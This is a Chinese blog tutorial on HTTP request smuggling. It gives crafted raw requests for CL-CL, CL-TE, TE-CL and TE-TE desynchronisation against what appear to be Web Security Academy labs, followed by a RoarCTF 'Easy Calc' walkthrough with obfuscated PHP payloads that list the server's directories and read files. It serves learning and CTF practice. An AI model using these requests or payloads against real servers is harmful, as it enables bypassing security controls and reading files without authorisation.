HTTP 请求走私漏洞

已于 2022-10-10 19:40:53 修改
阅读量1.4k 收藏 3
点赞数
文章标签: http 服务器 网络
于 2022-08-14 19:58:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63267612/article/details/126335233
版权

漏洞产生原理:
大多数HTTP请求走私漏洞的出现是因为HTTP规范提供了两种不同的方法来指定请求的结束位置:Content-Length标头和Transfer-Encoding标头。
同时使用两种不同的方法时,Content-Length无效。当使用多个服务器时,对客户端传入的数据理解不一致时,就会出现有些服务器认为Content-Length的长度有效,有些以Transfer-Encoding有效。而一般情况下,反向代理服务器与后端的源站服务器之间,会重用TCP链接。这样超出的长度就会拼接到下一次请求进行请求,从而导致HTTP请求走私漏洞。

简述原理:
由于前后端对请求消息的理解不同,从而造成了部分请求搁置再缓冲区,当进行下一次请求的时候,缓冲区的请求会拼接到该次请求,从而造成走私,走私再CTF中常见的利用方式就是:从服务器本地访问资源获得FLAG,因此我们需要构造X-F-D:127.0.0.1等等都可以

五种攻击方式:
CL不为0(前端允许GET请求携带请求体)
其实在这里,影响到的并不仅仅是GET请求,所有不携带请求体的HTTP请求都有可能受此影响,只因为GET比较典型,我们把它作为一个例子。

假设前端代理服务器允许GET请求携带请求体,而后端服务器不允许GET请求携带请求体,它会直接忽略掉GET请求中的Content-Length头,不进行处理。这就有可能导致请求走私。

比如我们构造请求

GET / HTTP/1.1\r\n
Host: example.com\r\n
Content-Length: 44\r\n

GET / secret HTTP/1.1\r\n
Host: example.com\r\n
\r\n

前端服务器收到该请求,通过读取Content-Length,判断这是一个完整的请求,然后转发给后端服务器,而后端服务器收到后,因为它不对Content-Length进行处理,由于Pipeline的存在,它就认为这是收到了两个请求,分别是

第一个
GET / HTTP/1.1\r\n
Host: example.com\r\n

第二个
GET / secret HTTP/1.1\r\n
Host: example.com\r\n

CL-CL
当服务器收到的请求中包含两个Content-Length,而且两者的值不同时,需要返回400错误。

但是总有服务器不会严格的实现该规范,假设中间的代理服务器和后端的源站服务器在收到类似的请求时,都不会返回400错误,但是中间代理服务器按照第一个Content-Length的值对请求进行处理,而后端源站服务器按照第二个Content-Length的值进行处理。

POST / HTTP/1.1\r\n
Host: example.com\r\n
Content-Length: 8\r\n
Content-Length: 7\r\n

12345\r\n
a

前端服务器读取第一个conent-length:8, 把12345\r\na转发给后端服务器,后端服务器读取content-length:7,读取7个字符:12345\r\n,那么剩下的a就会留在缓冲区,当进行下一次请求的时候,会出现以下情况:

aGET /index.html HTTP/1.1\r\n
Host: example.com\r\n

请求就会报错

CL-TE
所谓CL-TE,就是当收到存在两个请求头的请求包时,前端代理服务器只处理Content-Length这一请求头,而后端服务器会遵守RFC2616的规定,忽略掉Content-Length,处理Transfer-Encoding这一请求头。

chunk传输数据格式如下,其中size的值由16进制表示。

[chunk size][\r\n][chunk data][\r\n][chunk size][\r\n][chunk data][\r\n][chunk size = 0][\r\n][\r\n]

这里主要是理解以下chunk读取到哪里结束(个人认为读到最后一个\r\n就算结束)
构造的数据包

POST / HTTP/1.1\r\n
Host: ace01fcf1fd05faf80c21f8b00ea006b.web-security-academy.net\r\n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:56.0) Gecko/20100101 Firefox/56.0\r\n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n
Accept-Language: en-US,en;q=0.5\r\n
Cookie: session=E9m1pnYfbvtMyEnTYSe5eijPDC04EVm3\r\n
Connection: keep-alive\r\n
Content-Length: 6\r\n
Transfer-Encoding: chunked\r\n
\r\n
0\r\n
\r\n
G

分析:前端服务器用content-length读取了所有信息,而后端服务器读取Transfer-Encoding,此时读取到\r\n就会结束,那么多余的G就会留在缓冲区,下一次链接就会报错
在这里插入图片描述

TL-CL:
所谓TE-CL,就是当收到存在两个请求头的请求包时,前端代理服务器处理Transfer-Encoding这一请求头,而后端服务器处理Content-Length请求头。
构造数据包

POST / HTTP/1.1\r\n
Host: acf41f441edb9dc9806dca7b00000035.web-security-academy.net\r\n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:56.0) Gecko/20100101 Firefox/56.0\r\n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n
Accept-Language: en-US,en;q=0.5\r\n
Cookie: session=3Eyiu83ZSygjzgAfyGPn8VdGbKw5ifew\r\n
Content-Length: 4\r\n
Transfer-Encoding: chunked\r\n
\r\n
12\r\n
GPOST / HTTP/1.1\r\n
\r\n
0\r\n
\r\n

分析:因为前端是处理Transfer-Encoding这一请求头,所以以上内容会被一直读取到\r\n结束,但是后端是处理Content-length这一请求头,所以读取 \r\n12就结束,剩下的GPOST以及后面的内容就会存入缓冲区然后报错

TE-TE:
TE-TE

TE-TE,也很容易理解,当收到存在两个请求头的请求包时,前后端服务器都处理Transfer-Encoding请求头,这确实是实现了RFC的标准。不过前后端服务器毕竟不是同一种,这就有了一种方法,我们可以对发送的请求包中的Transfer-Encoding进行某种混淆操作(改变大小写),从而使其中一个服务器不处理Transfer-Encoding请求头。从某种意义上还是CL-TE或者TE-CL。
构造数据包

POST / HTTP/1.1\r\n
Host: ac4b1fcb1f596028803b11a2007400e4.web-security-academy.net\r\n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:56.0) Gecko/20100101 Firefox/56.0\r\n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n
Accept-Language: en-US,en;q=0.5\r\n
Cookie: session=Mew4QW7BRxkhk0p1Thny2GiXiZwZdMd8\r\n
Content-length: 4\r\n
Transfer-Encoding: chunked\r\n
Transfer-encoding: cow\r\n
\r\n
5c\r\n
GPOST / HTTP/1.1\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: 15\r\n
\r\n
x=1\r\n
0\r\n
\r\n

分析:
前端服务器处理Transfer-Encoding,当其读取到

0\r\n
\r\n

认为是读取结束。
此时这个请求对代理服务器来说是一个完整的请求,然后转发给后端服务器处理Transfer-encoding请求头,将Transfer-Encoding隐藏在服务端的一个chain中时,它将会回退到使用Content-Length去发送请求。读取到

5c\r\n

认为是读取完毕了。后面的数据就认为是另一个请求:

aPOST / HTTP/1.1\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: 15\r\n
\r\n
x=1\r\n
0\r\n
\r\n

成功报错,造成HTTP请求走私。
题目例子:[RoarCTF 2019]Easy Calc
php代码:

<?php
error_reporting(0);
if(!isset($_GET['num'])){
    show_source(__FILE__);
}else{
        $str = $_GET['num'];
        $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];
        foreach ($blacklist as $blackitem) {
                if (preg_match('/' . $blackitem . '/m', $str)) {
                        die("what are you want to do?");
                }
        }
        eval('echo '.$str.';');
}
?>

利用CL-CL漏洞,需要返回400错误
在这里插入图片描述
查看phpinfo()信息
在这里插入图片描述
getcwd():获取当前工作目录
在这里插入图片描述
var_dump(scandir(dirname(__FILE__))):获取当前目录下的文件
在这里插入图片描述
print_r(scandir(chr(47))):扫描根目录
在这里插入图片描述
var_dump(readfile(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))):读取flag
在这里插入图片描述

Lyyhun
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
http请求走私漏洞原理,利用,检测,防护
墨痕诉清风的博客
11-24 2656
当今的web架构中,单纯的一对一客户端---服务端结构已经逐渐过时。前端服务器与后端服务器。前端服务器(例如代理服务器)负责安全控制,只有被允许的请求才能转发给后端服务器,而后端服务器无条件的相信前端服务器转发过来的全部请求,并对每一个请求都进行响应。但是在这个过程中要保证前端服务器与后端服务器请求边界设定一致,如果前后端服务器请求包处理出现差异,那么就可能导致攻击者通过发送一个精心构造的http请求包,绕过前端服务器的安全策略直接抵达后端服务器访问到原本禁止访问的服务或接口,这就是http请求走私
CVE-2021-40346 HAProxy——http请求走私漏洞
weixin_45260839的博客
08-28 857
CVE-2021-40346 HAProxy——http请求走私漏洞
HTTP请求走私漏洞简单分析_apache 2(1),网络安全开发零基础
m0_61418075的博客
04-07 707
大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新**
http走私漏洞
qq_51553814的博客
11-06 361
这里先贴上几位大佬的笔记,我觉得我自己记得笔记肯定没有他们写的好 这个连接写的少点,但关于http走私漏洞的理解已经够了 这个笔记真的是面面俱到,妥妥的大佬 当前的互联网环境 在当前,很多网站为了防止服务器压力太大,往往会设置一个代理服务器,一些静态网页,就直接由代理服务器响应 这么说可能不太好理解,通俗点说就是,如果我们发送请求,每次都往一个服务器发送,然后服务器处理数据,这样一来后服务器压力就太大了。所以服务商就采用了一个代理服务器,我们每次发送请求全都是发给代理服务器,一些简单的请求,代理服务器能够处
HTTP 请求走私漏洞详解
最新发布
江左盟的博客
07-08 1688
超详细的HTTP请求走私漏洞教程,看完还不会你来找我。
HTTP 请求走私漏洞HTTP Request Smuggling)
weixin_42451330的博客
07-18 4584
HTTP请求走私漏洞HTTP Request Smuggling)是一种安全漏洞,利用了HTTP协议中请求和响应的解析和处理方式的不一致性。攻击者通过构造特定的恶意请求,以欺骗服务器和代理服务器,从而绕过安全机制,执行未经授权的操作。HTTP请求走私漏洞通常涉及两个或多个HTTP请求的组合,攻击者可以利用HTTP报文中的头部或其他元数据来混淆和欺骗服务器或代理服务器的解析逻辑。
HTTP请求走私漏洞
Atkx's Blog
04-11 5367
这里写自定义目录标题 [RoarCTF 2019]Easy Calc calc.php代码 <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];
HTTP请求走私
qq_53142368的博客
05-07 4111
今天看到学委在班级群里说最近天气变化太快,让我们别感冒了发烧了!我想说的是!!! 自从有了每天健康报备后,我每天的体温完美的控制在了36.5。上大学已经两年,从健康报备的角度来看,两年时间里我从来没有感冒过,发烧?不存在的好吧! HTTP请求走私 1、漏洞概述 HTTP走私产生的原因是 2、漏洞攻击方式 3、如何判断是否有HTTP走私漏洞 4、防护措施 ...
http请求走私
qingjie0ng的博客
01-12 2002
http 1.1 (应用层) 特性: keepalive 建立一次tcp连接后,并不会把连接关闭(完成tcp三次握手) pipline 可在同一个请求的head(报头)写入两个http请求HTTP协议中的Transfer-Encoding:HTTP 协议中的 Transfer-Encoding | JerryQu 的小站 HTTP请求走私漏洞的产生:大多数 HTTP 请求走私漏洞的出现是因为 HTTP 规范提供了两种不同的方式来指定请求的结束位置:Cont
gunicorn 20.0.4 请求走私漏洞
qq_61142406的博客
05-26 1632
某比赛的一个题,不知道结束没有,就不说名字了 gunicorn <= 20.0.4,无论在gunicorn 前使用哪个代理,该漏洞都有效, Http头中的 Sec-Websocket-Key: 1 会进行特殊解析,从而引发此漏洞 /fl4g禁止访问 payload: echo -en "GET / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 90\r\nSec-Websocket-Key1: x\r\n\r\nxxxxxxxxGET /fl4g HTT
一文了解HTTP走私请求漏洞
闵行小鱼塘
05-08 1229
之前听一位师傅提了一嘴HTTP走私请求漏洞,挺感兴趣,就学习了下。主要思想是在HTTP中隐藏HTTP,或者说将HTTP协议注入HTTP协议
挖掘HTTP请求走私漏洞
qq_22132931的博客
01-17 898
挖掘HTTP请求走私漏洞
HTTP请求走私漏洞简单分析
Aiwin的博客
07-30 1229
HTTP请求走私漏洞简单分析
HTTP请求走私漏洞浅析
zkaqlaoniao的博客
03-14 998
HTTP请求走私漏洞(HTTP Request Smuggling)是发生协议层的一种攻击,最早于2005年就被发现并提出。漏洞发生的主要原因是不同的服务器,对于RFC标准的具体实现不一而导致的。
web渗透测试----19、HTTP请求走私--(1)HTTP请求走私漏洞的挖掘
七天
12-30 3988
HTTP请求走私漏洞简介 HTTP请求走私漏洞的产生 HTTP请求走私漏洞的挖掘
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值